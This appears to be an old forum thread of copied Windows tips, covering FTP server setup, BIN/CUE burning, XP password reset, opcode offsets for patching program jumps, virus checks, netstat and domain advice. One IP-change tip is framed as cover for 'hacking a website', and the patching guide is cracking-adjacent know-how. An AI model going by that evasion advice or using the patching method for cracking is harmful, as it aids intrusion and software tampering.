7. Click on the 'advanced' tab
8. At the bottom again look at the 'hammering area'
9. Enable 'anti-hammer' and 'do not reply to people hammering' Set it for the following: Block IP 120 min if 5 connections in 60 sec. You can set this at whatever you want to but that is pretty much a standard Click 'OK'

Adding Users
11. Setup > User accounts form pull-down.
12. Right click in the empty 'User Accounts' area on the right: choose 'Add'
13. Enter account name. (ie: logon name)
14. In the 'Access rights' box right click: choose ‘Add’.
15. Browse until you find the directory (folder) you want to share. In the right column you will see a bunch of checkboxes. Put a check in the following ones: Read, Write, Append, Make, List, and +Subdirs. Press 'select'.
16. Enter a password for your new FTP account.
17. Click on 'Miscellaneous' in the left column. Make sure 'Enable Account' is selected. Enable 'Max Number of Users' set it at a number other than zero. 1 for a personal account and more that one for a group account. Enable 'Max. no. of connects per IP' set it at 1

18. Under 'Files' enable 'show relative path' this is a security issue. A FTP client will now not be able to see the ENTIRE path of the FTP. It will only see the path from the main directory. Hide hidden flies as well.
Put a tick in both of these.

Advanced:
You don't need to do any of this stuff, but It will help tweak your server and help you maintain order on it. All of the following will be broken down into small little areas that will tell you how to do one thing at a time.

Changing the Port
The default port is always 21, but you can change this. Many ISPs will routinely do a scan of its own users to find a ftp server, also when people scan for pubs they may scan your IP, thus finding your ftp server. If you do decide to change it many suggest that you make the port over 10,000.
1. Setup > Main > General
2. In the 'Connection' Area is a setting labeled 'Listen on Port Number:'
3. Make it any number you want. That will be your port number.
4. Click 'OK'

Making an 'Upload Only' or 'Download Only' ftp server.
This is for the entire SERVER, not just a user.
1. Setup > Main > Advanced
2. In the advanced window you will have the following options: uploads and downloads, downloads only, and uploads only. By default upload and download will be checked. Change it to whatever you want.
3. Click 'OK’


While you are running your server, usually you will end up spending more time at your computer than you normally do. Don't be afraid to ban IP's. Remember, on your FTP you do as you want.

When you are online you must also select the open server button next to the on-line button which is the on-line Button

You also have to use the actual Numbered ip Address ie: 66.250.216.67

Or even Better yet, get a no-ip.com address

Master
29-04-07, 00:25
To burn a bin file, you will need an appropriate cue file.

You do exactly the same as for iso files, but when you click on “burn image,” you don’t browse to the bin itself, but instead to the cue file, and you open that one.
When the writer starts to burn, it will automatically search for the bin file and start burning it. In fact, the cue file tells the burning program where it can find the bin file that is attached to it. It is VERY IMPORTANT that you use the right cue file when you burn a bin. i.e both cue and bin files that are attached to each other must be located in the same folder, and every bin file has it’s own cue file.


Normally, when you download a bin file, you can download the appropriate cue file as well. If you do not have the cue file (or feel bold) you can make the cue file yourself, which is really easy to do:

a. Open notepad

b. Copy the folowing text into notepad:

FILE“nameofimage“BINARY
TRACK 01 MODE1/2352
INDEX 01 00:00:00

Where nameofimage.bin is the name of the bin file you want ot burn.

c. The rest is easy: just save the notepad text with the name of the bin, but with the cue extension.

d. The file should be saved in the same folder as its appropriate bin file and should be something like myfile.cue

Or you can use Alcohol 120% to burn directly from the bin file

Master
29-04-07, 00:26
Burn a BIN without a CUE using NERO

You've downloaded a *.BIN file, but there was no *.CUE file associated and you still want to burn the *.BIN file using Nero

Your options are:

1) Create yourself a *.CUE

2) Convert the *.BIN to an *.ISO

3) OR use Nero to burn without the *.CUE file!!!

Yes, that's possible... just follow these steps and you will be sorted. No need for *.CUE files anymore

Ok, here we go...

1) Start Nero

2) File -> Burn Image

3) Browse to the *.BIN file that you want to burn and open it

4) A window saying "Foreign Image Settings" will open

5) Check the settings. They should be as followed:

* Type of image: leave it to Data Mode 1
* Select the Raw Data check box
Note ->> The block size will change automatically from 2048 to 2352
* Leave Image Header and Image Trailer unchanged and set to 0
* Leave "Scrambled" and "Swapped" check boxes unchecked

6) Click on burn!

7) Enjoy

This tut was for Nero 5.x.x.x, I was told that "Burn Image" is under "recorder" in Nero 6. The rest of the steps should be the same...
xkalibur

Master
29-04-07, 00:28
Burning BIN/CUE Images with Nero Burning Rom

BIN/CUE image format is quite common on the Internet. It might seem that finding an appropriate software for burning these images is quite hard. Luckily, it's not. In addition to Golden Hawk CDRWin, the original software for BIN/CUE format, you can also use Nero Burning Rom to burn the images.

Please make sure that you have the latest version of Nero, which now is 5.5.10.0


Verify the CUE-sheet and open it with Nero
Before doing anything else you have to verify that the path in the CUE-sheet is correct. A CUE-sheet is a plaintext file describing the structure and the location of the BIN-file. You can open up the .CUE -file using, for example, Notepad.

The file should look something like this:

FILE "IMAGE.BIN" BINARY
TRACK 01 MODE1/2352
INDEX 01 00:00:00


Usually the CUE-filename and the BIN-filename have the same body -- e.g. IMAGE. All you need to do is verify that there is no path information on the
FILE "IMAGE.BIN" BINARY
-line. Ie. it should NOT read e.g.
FILE "C:\TEMP\IMAGE.BIN" BINARY
If there is any path information on the line, just remove it so that you have just the name of the .BIN-file as in the example above. Also make sure that the name of the .BIN in the CUE-sheet is the same as the actual .BIN file you have on hard-disk.

Next load Nero Burning Rom and choose File, Burn Image....

Load the CUE-sheet in Nero
Choose the Files of Type: dropdown menu and select All Files *.*. Next just locate the .CUE file, select it and click Open. Make sure you select the .CUE -file, not the .BIN -file.

Burn the image
All you have to do then is choose the writing speed, select the Disc-At-Once Write Method, and click Write.

That's it! After a couple of minutes you'll have a CD with the BIN/CUE Image written on it.


NOTES:
--> Do not worry if the BIN file seems larger than the capacity of your CD-R or CD-RW. Bin files are raw data and once burned, the file size is smaller.

--> If you have a DVD burner, just burn the cue/bin directly onto the DVD. Then use Daemon Tools to mount the cue/bin image when you use the files. This way you maintain a true exact image. And Daemon Tools (also Alcohol CDR burning software, which has the same feature) mounts the image, and you see the files instead of the bin/cue.
_________________

Master
29-04-07, 00:29
Because of the security features built into Windows XP, it is virtually impossible to get back into the system without the password.
You have several options to try and get around this problem.


If you have access to another user account with administrator rights, you can use that account to change the password
of the account that is locked out. You can also use the default Administrator account that is built into Windows XP.

First you need to boot the system into Safe Mode.
1.Restart your system.
2.When you see the blue Dell globe or screen, press the ( F8 ) key about 3 times a second.
3.You should get the Windows startup menu. Use the (Up or Down) arrow keys to highlight (SafeMode)
4.Press (Enter) on (Safe Mode), then press (Enter) on (Windows XP).
5.The system should boot to Safe Mode.

Once you are at the Account Log on Screen, click on the icon
for the user account with administrator rights, or click on the icon
for the administrators account.
Note: For Home the Administrator account isn't normally shown & in Safe Mode you have to press Ctrl+Alt+Delete keys twice to show.
For PRO you can do this in normal mode

When the system has booted to the desktop, use the following steps to change the accounts password.
1.Click Start, Control Panel, Administrative Tools.
2.Click Computer Management.
3.Double click Local Users and Groups, double click the folder Users.
4.Right click on the account name that is locked out, and click on Set Password.
5.You may get a warning message about changing the password, simply click proceed.
6.Leave the New Password box blank, also leave the Confirm Password box blank.
7.Click OK, and OK again.
8.Then close all Windows, reboot the system and try to log in.


There are also applications that can recover the password for you.
The following companies provide these applications at a cost.
iOpus® Password Recovery XP here.
LostPassword.com, here.
Asterisk Password Recovery XP v1.89 here.
Windows XP / 2000 / NT Key here.


If the above information does not help in recovering the password, the only option left is to
format the hard drive then reinstall Windows and the system software.

Master
29-04-07, 00:30
Introduction

This tutorial is more of a tip than a tutorial. It just explains how to calculate offsets for jumps and calls within the program you are patching.

Types of Jumps/Calls

Here I will just describe the different types of jumps and calls which you will come across:

Short Jumps
Short jumps be they conditional or unconditional jumps are 2 bytes long (or 1 nibble if your Californian ;-). These are relative jumps taken from the first byte after the two bytes of the jump. Using short jumps you can jump a maximum of 127 bytes forward and 128 bytes backwards.

Long Jumps
Long jumps if they are relative are 6 bytes long for conditional jumps and are 5 bytes long for unconditional jumps. For conditional jumps 2 bytes are used to identify that it is a long jump and what type of jump (je, jg, jns etc) it is. The other 4 bytes are used to show how far away the target location is relative to the first byte after the jump. In an unconditional jump only 1 byte is used to identify it as a long unconditional jump and the other 4 are used to show it's target's relative position, as with the conditional jumps.

Calls
There are two different types of calls which we will use. The normal type of call works the same as the long jumps in that it is relative to it's current position. The other type gives a reference to a memory location, register or stack position which holds the memory location it will call. The position held by the later is direct e.g. the memory location referenced may contain 401036h which would be the exact position that you would call, not relative to the position of the call. The size of these types of calls depends on any calculations involved in the call i.e. you could do: 'call dword ptr [eax * edx + 2]'. Long jumps can also be made using this method, but I didn't say that earlier as to avoid repetition.

Tables
Here is a brief list of all the different types of jumps/calls and their appropriate op-codes. Where different jumps have the same Op-Codes I have grouped them:

Jump Description Short Op-Code Long Op-Code
call procedure call E8xxxxxxxx N/A
jmp u nconditional jump EBxx E9xxxxxxxx
ja/jnbe jump if above 77xx 0F87xxxxxxxx
jae/jnb/jnc jump if above or equal 73xx 0F83xxxxxxxx
jb/jc/jnae jump if below 72xx 0F82xxxxxxxx
jbe/jna jump if below or equal 76xx 0F86xxxxxxxx
jcxz/jecxz jump if cx/ecx equals zero E3xx N/A
je/jz jump if equal/zero 74xx 0F84xxxxxxxx
jne/jnz jump if not equal/zero 75xx 0F85xxxxxxxx
jg/jnle jump if greater 7Fxx 0F8Fxxxxxxxx
jge/jnl jump if greater or equal 7Dxx 0F8Dxxxxxxxx
jl/jnge jump if less 7Cxx 0F8Cxxxxxxxx
jle/jng jump if less or equal 7Exx 0F8Exxxxxxxx
jno jump if not overflow 71xx 0F81xxxxxxxx
jnp/jpo jump if no parity/parity odd 7Bxx 0F8Bxxxxxxxx
jns jump if not signed 79xx 0F89xxxxxxxx
jo jump if overflow 70xx 0F80xxxxxxxx
jp/jpe jump if parity/parity even 7Axx 0F8Axxxxxxxx
js jump if sign 78xx 0F88xxxxxxxx



Calculating Offsets (finding in the xx's in table)

You will need to be able to calculate offsets when you add jumps and make calls within and to the code you have added. If you choose to do this by hand instead of using a tool then here are the basics:

For jumps and calls further on in memory from your current position you take the address where you want to jump/call and subtract from it the memory location of the next instruction after your call/jump i.e.:

(target mem address) - (mem location of next instruction after call/jump)

Example
If we wanted to jump to 4020d0 and the next instruction *after* the jump is at location 401093 then we would use the following calculation:

4020d0 - 401093 = 103d

We then write the jump instruction in hex as e93d100000 where e9 is the hex op-code for a long relative jump and 3d100000 is the result of our calculation expanded to dword size and reversed.

For jumps and calls to locations *before* the current location in memory you take the address you want to call/jump to and subtract it from the memory location of the next instruction after your call/jump, then subtract 1 and finally perform a logical NOT on the result i.e.

NOT(mem address of next instruction - target mem address - 1)

Example
If we wanted to call location 401184 and the address of the next instruction after the call is 402190 then we do the following calculation:

NOT(402190 - 401184 - 1 ) = ffffeff4

We can then write our call instruction in hex as e8f4efffff where e8 is the hex op-code for relative call and f4efffff is the result of the calculation in reverse order.

If you want to practice with different examples then the best way to do this is to use a disassembler like WDASM which shows you the op-codes and try and work out the results yourself. Also as an end note you don't have to perform these calculations if you have enough room to make your jump or call instruction into an absolute jump call by doing the following as represented in assembler:

mov eax, 4020d0
call eax (or jmp eax)

Final Notes

Make life easier and use a program to do this ;-)

Master
29-04-07, 00:31
Cant See Secure Sites

Fix the problem with seeing them secrue sites (banks or online stores) i found this very usefull to me at my work (isp backbone support lol, at the time i was regular support )

Any way... what u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these



regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll


and save it as > all file types, and make it something like securefix.bat.

then just run the file and ur problem shuld be gone.

Master
29-04-07, 00:32
Caught A Virus?

If you've let your guard down--or even if you haven't--it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.


Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you'll lose all your data, and you'll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they're right. Yet for one reason or another, you're not running antivirus software, or you are but it's not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you've put off renewing.

It happens. It's nothing to be ashamed of. But chances are, either you're infected right now, as we speak, or you will be very soon.

For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, "an unprotected [Windows] computer will become owned by a bot within 14 minutes."

Today's viruses, worms, and so-called bots--which turn your PC into a zombie that does the hacker's bidding (such as mass-mailing spam)--aren't going to announce their presence. Real viruses aren't like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you're not well protected.

Is Your PC "Owned?"

I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program's presence. People who write commercial software put icons all over your desktop. Who's going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there's nothing that you need to worry about, include:

* An automated e-mail telling you that you're sending out infected mail. E-mail viruses and worms typically come from faked addresses.
* A frantic note from a friend saying they've been infected, and therefore so have you. This is likely a hoax. It's especially suspicious if the note tells you the virus can't be detected but you can get rid of it by deleting one simple file. Don't be fooled--and don't delete that file.

I'm not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.

Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you're not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check "Show icon in notification area when connected," and click OK.

If you're interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you'll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type "services.msc" in the box, and press Enter. You'll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing "msconfig" in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won't run--or if your security software won't run--that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.

What to Do Next

Once you're fairly sure your system is infected, don't panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don't have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There's McAfee FreeScan, Symantec Security Check, and Trend Micro's HouseCall. If one doesn't find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you're done, buy or download a real antivirus program.
* If you have antivirus software, but it isn't active, get offline, unplug wires-- whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.
* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses--if manual removal is possible--or a free removal tool if it isn't. Check out GriSOFT's Virus Encyclopedia, Eset's Virus Descriptions, McAffee's Virus Glossary, Symantec's Virus Encyclopedia, or Trend Micro's Virus Encyclopedia.

A Microgram of Prevention

Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer's security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro's PC-Cillin, which you can buy for $50.

Don't want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn't worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it's right there on your Start Menu) to make sure you're getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say "Service Pack 2."

Here are a few more pointers for a virus-free life:

* Be careful with e-mail. Set your e-mail software security settings to high. Don't open messages with generic-sounding subjects that don't apply specifically to you from people you don't know. Don't open an attachment unless you're expecting it.
* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.
* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research's Web site and run the free ShieldsUP test to see your ports' status. If some ports show up as closed--or worse yet, open--check your router's documentation to find out how to hide them.

Master
29-04-07, 00:33
TOOLS YOU WILL NEED (ADOBE AUDITION)

in your Grand Theft Auto Vice City / Audio folder you will see a bunch of mp3's


you wanna find

malibu.mp3
strip.mp3
stripa.mp3 (short clip only needs to be half of a song)

open a few songs for each clip you want to make.. (fade the beginning or end of the songs if you want to) and open multitrack view.. you can have them fade into eachother. once you have the multitrack session finished go to "FILE" then "SAVE MIXDOWN AS"

you want to save as a 128k 32000 Hz MONO FIle (the same type as the originals) but normal internet 128k 44.1 stereo should work also.. just save as say malibu.mp3 and then replace the one in your audio folder for the one you created.

when i walk into the Malibu i hear david banner and lil' jon singing

"YEEEAAAEEEHH!! OK!!..... WHAT!!..... WHAT!!"

Master
29-04-07, 00:34
I just found out about this today, and I use Windows XP for some time now, so i guess there are others out there who don't know about this yet.

But normally windows saves the "My Documents" folder on your C-drive. But when you right-click on it and go to properties, you can change the location where you want windows to save your Documents folder.
I have a partition set up with just windows on it, and all my things i want to keep are on different partitions/disks. So now I put My Documents on another partition than where I have windows installed. If windows screws up and you have to format your C-drive again, your documents will be spared at least...

Master
29-04-07, 00:34
How To: Change Your Ip In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Master
29-04-07, 00:35
Change The Default Location For Installing Apps
-----------------------------------------------

As the size of hard drives increase, more people are using partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.

Go to :-

- Start > Run

- Type “regedit” (without “” NOOBS!)

- Go to this directory…
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion

- Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Master
29-04-07, 00:36
When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),
open a MS-DOS Prompt window (start/programs MS-DOS Prompt).
Then type netstat -arn and press the Enter key.
Your screen should display the following (without the dotted lines
which I added for clarification).

-----------------------------------------------------------------------------
Active Routes:

Network Address Netmask Gateway Address Interface Metric
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
255.255.255.255 255.255.255.255 255.255.255.255 0.0.0.0 1

Route Table

Active Connections

Proto Local Address Foreign Address State

--------------------------------------------------------------------------------

If you see anything else, there might be a problem (more on that later).
Now dial into your ISP, once you are connected;
go back to the MS-DOS Prompt and run the same command as before
netstat -arn, this time it will look similar to the following (without
dotted lines).

-------------------------------------------------------------------------------------

Active Routes:

Network Address Netmask Gateway Address Interface Metric
0.0.0.0 0.0.0.0 216.1.104.70 216.1.104.70 1
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
216.1.104.0 255.255.255.0 216.1.104.70 216.1.104.70 1
216.1.104.70 255.255.255.255 127.0.0.1 127.0.0.1 1
216.1.104.255 255.255.255.255 216.1.104.70 216.1.104.70 1
224.0.0.0 224.0.0.0 216.1.104.70 216.1.104.70 1
255.255.255.255 255.255.255.255 216.1.104.70 216.1.104.70 1

Route Table

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:0 0.0.0.0:0 LISTENING
TCP 216.1.104.70:137 0.0.0.0:0 LISTENING
TCP 216.1.104.70:138 0.0.0.0:0 LISTENING
TCP 216.1.104.70:139 0.0.0.0:0 LISTENING
UDP 216.1.104.70:137 *:*

--------------------------------------------------------------------------------

What you are seeing in the first section (Active Routes) under the heading of
Network Address are some additional lines. The only ones that should be there
are ones belonging to your ISP (more on that later). In the second section
(Route Table) under Local Address you are seeing the IP address that your ISP
assigned you (in this example 216.1.104.70).

The numbers are divided into four dot notations, the first three should be
the same for both sets, while in this case the .70 is the unique number
assigned for THIS session. Next time you dial in that number will more than
likely be different.

To make sure that the first three notation are as they should be, we will run
one more command from the MS-DOS window.
From the MS-DOS Prompt type tracert /Only the registered members can see the link or .net
or whatever it ends in. Following is an example of the output you should see.

---------------------------------------------------------------------------------------

Tracing route to /Only the registered members can see the link [207.239.117.112]over a maximum of 30 hops:
1 128 ms 2084 ms 102 ms chat-port.motion.net [216.1.104.4]
2 115 ms 188 ms 117 ms chat-core.motion.net [216.1.104.1]
3 108 ms 116 ms 119 ms Only the registered members can see the link [207.239.117.112]
Trace complete.

------------------------------------------------------------------------------------------

You will see that on lines with the 1 and 2 the first three notations of the
address match with what we saw above, which is a good thing. If it does not,
then some further investigation is needed.

If everything matches like above, you can almost breath easier. Another thing
which should you should check is programs launched during startup. To find
these, Click start/programs/startup, look at what shows up. You should be
able to recognize everything there, if not, once again more investigation is
needed.

-------------------------------------------------------------------------------------------

Now just because everything reported out like we expected (and demonstrated
above) we still are not out of the woods. How is this so, you ask? Do you use
Netmeeting? Do you get on IRC (Internet Relay Chat)? Or any other program
that makes use of the Internet. Have you every recieved an email with an
attachment that ended in .exe? The list goes on and on, basically anything
that you run could have become infected with a trojan. What this means, is
the program appears to do what you expect, but also does just a little more.
This little more could be blasting ebay.com or one of the other sites that
CNNlive was talking about.

What can you do? Well some anti-virus software will detect some trojans.
Another (tedious) thing is to start each of these "extra" Internet programs
one at a time and go through the last two steps above, looking at the routes
and connection the program uses. However, the tricky part will be figuring
out where to tracert to in order to find out if the addresses you see in
step 2 are "safe" or not. I should forewarn you, that running tracert after
tracert, after tracert might be considered "improper" by your ISP. The steps
outlined above may not work exactly as I have stated depending upon your ISP,
but with a true ISP it should work. Finally, this advise comes with NO
warranty and by following my "hints' you implicitly release me from ANY and
ALL liability which you may incur.


Other options

Display protocol statistics and current TCP/IP network connections.
Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]

-a.. Display all connections and listening ports.
-e.. Display Ethernet statistics. This may be combined with the -s option.
-n.. Diplays address and port numbers in the numerical form.
-p proto..Shows connections for the protocol specified by proto; proto may be
TCP or UDP. If used with the -s option to display per-protocol statistics,
proto may be TCP, UDP, of IP.
-r.. Display the routing table.
-s.. Display per-protocol statistics. By default, statistics are shown for TCP
UDP and IP; the -p option may be used to specify a subset of the default
interval..Redisplay selected statistics, pausing intervals seconds between each
display. If omitted. netstat will print the current configuration information
once

Master
29-04-07, 00:36
Another good tip for successful web experience..injoy it!



Choosing A Good Domain Name


Choosing a domain name for your site is one of the most important steps towards creating the perfect internet presence. If you run an on-line business, picking a name that will be marketable and achieve success in search engine placement is paramount. Many factors must be considered when choosing a good domain name. This article summarizes all the different things to consider before making that final registration step!


Short and Sweet

Domain names can be really long or really short (1 - 67 characters). In general, it is far better to choose a domain name that is short in length. The shorter your domain name, the easier it will be for people remember. Remembering a domain name is very important from a marketability perspective. As visitors reach your site and enjoy using it, they will likely tell people about it. And those people may tell others, etc. As with any business, word of mouth is the most powerful marketing tool to drive traffic to your site (and it's free too!). If your site is long and difficult to pronounce, people will not remember the name of the site and unless they bookmark the link, they may never return.


Consider Alternatives

Unless a visitor reaches your site through a bookmark or a link from another site, they have typed in your domain name. Most people on the internet are terrible typists and misspell words constantly. If your domain name is easy to misspell, you should think about alternate domain names to purchase. For example, if your site will be called "MikesTools.com", you should also consider buying "MikeTools.com" and "MikeTool.com". You should also secure the different top level domain names besides the one you will use for marketing purposes ("MikesTools.net", "MikesTools.org", etc.) You should also check to see if there are existing sites based on the misspelled version of the domain name you are considering. "MikesTools.com" may be available, but "MikesTool.com" may be home to a graphic pornography site. You would hate for a visitor to walk away thinking you were hosting something they did not expect.

Also consider domain names that may not include the name of your company, but rather what your company provides. For example, if the name of your company is Mike's Tools, you may want to consider domain names that target what you sell. For example: "buyhammers.com" or "hammer-and-nail.com". Even though these example alternative domain names do not include the name of your company, it provides an avenue for visitors from your target markets. Remember that you can own multiple domain names, all of which can point to a single domain. For example, you could register "buyhammers.com", "hammer-and-nail.com", and "mikestools.com" and have "buyhammers.com" and "hammer-and-nail.com" point to "mikestools.com".


Hyphens: Your Friend and Enemy

Domain name availability has become more and more scant over the years. Many single word domain names have been scooped up which it makes it more and more difficult to find a domain name that you like and is available. When selecting a domain name, you have the option of including hyphens as part of the name. Hyphens help because it allows you to clearly separate multiple words in a domain name, making it less likely that a person will accidentally misspell the name. For example, people are more likely to misspell "domainnamecenter.com" than they are "domain-name-center.com". Having words crunched together makes it hard on the eyes, increasing the likelihood of a misspelling. On the other hand, hyphens make your domain name longer. The longer the domain name, the easier it is for people to forget it altogether. Also, if someone recommends a site to someone else, they may forget to mention that each word in the domain name is separated by a hyphen. If do you choose to leverage hyphens, limit the number of words between the hyphens to three. Another advantage to using hyphens is that search engines are able to pick up each unique word in the domain name as key words, thus helping to make your site more visible in search engine results.


Dot What?

There are many top level domain names available today including .com, .net, .org, and .biz. In most cases, the more unusual the top level domain, the more available domain names are available. However, the .com top level domain is far and away the most commonly used domain on the internet, driven by the fact that it was the first domain extension put to use commercially and has received incredible media attention. If you cannot lay your hands on a .com domain name, look for a .net domain name, which is the second most commercially popular domain name extension.


Long Arm of the Law

Be very careful not to register domain names that include trademarked names. Although internet domain name law disputes are tricky and have few cases in existence, the risk of a legal battle is not a risk worth taking. Even if you believe your domain name is untouchable by a business that has trademarked a name, do not take the chance: the cost of litigation is extremely high and unless you have deep pockets you will not likely have the resources to defend yourself in a court of law. Even stay away from domain names in which part of the name is trademarked: the risks are the same.


Search Engines and Directories

All search engines and directories are different. Each has a unique process for being part of the results or directory listing and each has a different way of sorting and listing domain names. Search engines and directories are the most important on-line marketing channel, so consider how your domain name choice affects site placement before you register the domain. Most directories simply list links to home pages in alphabetical order. If possible, choose a domain name with a letter of the alphabet near the beginning ("a" or "b"). For example, "aardvark-pest-control.com" will come way above "joes-pest-control.com". However, check the directories before you choose a domain name. You may find that the directories you would like be in are already cluttered with domain names beginning with the letter "a". Search engines scan websites and sort results based on key words. Key words are words that a person visiting a search engine actually search on. Having key words as part of your domain name can help you get better results.

Master
29-04-07, 00:38
I hope this insight wii provide a good use for those who want to do business on the web..



Choosing An Internet Merchant Account


Surf to Google and perform a search on "Internet Merchant Account". The results are staggering (472,000 results!) If you have created a web based business and need to accept credit card payments, your choices are limitless. Before you partner with a provider, take time to understand the different components of internet credit card processing, and know what to look for in a merchant provider.


How It Works

Accepting credit card payments through your web site actually requires multiple components. Between a paying customer and your bank account, three layers exist:

Payment Gateway - This is the code that will transmit a customer's order to and from an internet merchant account provider. The payment gateway provides you the ability to accept customer billing information (credit card number, credit card type, expiration date, and payment amount) and the necessary validation steps that must be followed before the credit card is actually billed.

Internet Merchant Account - A Merchant Account is an account with a financial institution or bank, which enables you to accept credit card payments from your clients. The payment gateway actually transmits the billing information to the internet merchant account provider. Unfortunately, most local banks do not provide internet merchant account capability.

The main reason why most local financial institutions or banks do not want to provide online merchant accounts is because transactions conducted over the Internet are totally different from face to face transactions where a signature is required to authorize the purchase. This makes online transactions prone to credit card fraud. Fraud protection should be one of your primary considerations when choosing an internet merchant account provider.

Web Site - Regardless of which merchant provider and gateway service you choose, your web site will need to integrate with your service providers. Most providers include detailed web integration instructions.


How Much Does It Cost ?

Understanding the total costs of your merchant provider can be tricky. Remember my Google example - there are more merchant account providers than there are people looking for internet merchant accounts so ask questions and be picky! Typically, an internet merchant account will have three types of costs:

- Up Front Application Fees
- On Going Fixed Fee
- Discount Rate
- Fixed Transaction Fee
- Termination Fees
- Miscellaneous Fees

Let us discuss each type of cost:

* Up Front Application Fees

Many internet merchant accounts will require an up front application fee. This fee, supposedly, is to cover their costs for processing your application. In case you choose not to open an internet merchant account, they still cover their initial costs. Although common, many providers waive these fees and I recommend that you choose a provider that does not require an up front fee.

* On Going Fixed Fee

Most all internet merchant providers require a monthly fixed fee or "statement fee" as it is commonly named, which is simply another way to cover their costs and make money. You will be hard pressed to find a provider that does not require this type of fee on a monthly basis. However, do not choose an internet merchant account that requires more than $10 per month. Additionally, most internet merchant providers require a monthly minimum (usually $25). The bottom line is that you will be paying at least $25 per month (on top of the monthly statement fee) for your account.

* Discount Rate

Usually, the discount rate will be between 2 and 4 percent. The discount rate is the sales commission the provider earns on each sale. For example, if the discount rate offered is 3%, and you receive a sale over your web site for $20, you will owe 60 cents to your internet merchant provider.

